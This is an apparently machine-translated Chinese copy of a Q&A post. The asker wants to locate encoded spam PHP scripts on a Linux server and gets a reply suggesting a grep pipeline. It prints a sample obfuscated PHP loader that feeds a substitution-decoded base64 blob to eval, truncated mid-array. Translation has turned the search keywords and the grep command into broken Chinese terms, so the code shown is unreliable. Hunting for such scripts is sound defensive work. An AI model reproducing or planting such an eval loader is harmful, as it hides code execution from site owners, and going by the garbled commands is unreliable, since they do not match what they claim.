0
我需要找到在Linux服務器上具有完全相同的4種模式的PHP腳本。找到4種模式的PHP文件
的文件需要有4模式/字,而不是隻有一兩個...
模式:
- EVAL
- BASE64_DECODE
- 陣列
- 功能
我需要這個來找到編碼垃圾郵件腳本。
我已經試過找到,但我不知道如何搭配的精確4種模式
像這樣:
<?php
function isanrl($nhfxslsmo, $rrkiu){$m = ''; for($i=0; $i < strlen($nhfxslsmo); $i++){$m .= isset($rrkiu[$nhfxslsmo[$i]]) ? $rrkiu[$nhfxslsmo[$i]] : $nhfxslsmo[$i];}
$dbklusmzx="base64_decode";return $dbklusmzx($m);}
$mpvqrt = 'XLgWYavbkPXhdna5ruv5PnoVk5rNSZea4Z1FK1FIYpeFPqBgx8f76Lv7Pna5ruv5r5rNSsIFK1F'.
'IYpeFPqBgx8f76pi9Pna9kpB2xLgV6gv3Yp2gd51fm8DG8DzbkPRJxLg0kavNYp2Fx8f1C'.
'4NC8uguCLgbrna3C8RJU3awaDawCwDCT1hddiv4RadpRad6d2zSUiv4RUoLd23fHwIMA5SGSIhddiv4R'.
'C8wR5kPB6S7SMPaNMjMdxSs3fdLdEksNC8PdgxQa56MzMjPBgBcRJkpec6nRgCQBgrugE6LgtkwfDruabCwDG873'.
'=';
$qqkghzt = Array('1'=>'w', '0'=>'t', '3'=>'0', '2'=>'1', '5'=>'y', '4'=>'T', '7'=>'n', '6'=>'b', '9'=>'4', '8'=>'C', 'A'=>'L', 'C'=>'K', 'B'=>'N', 'E'=>'h', 'D'=>'k$
eval(isanrl($mpvqrt, $qqkghzt));?>
轉到代碼庫根目錄並嘗試grep'eval'-r。 | grep'base64_decode'| grep'Array'| grep'函數'。我想這會列出所有4個文件。 – chris85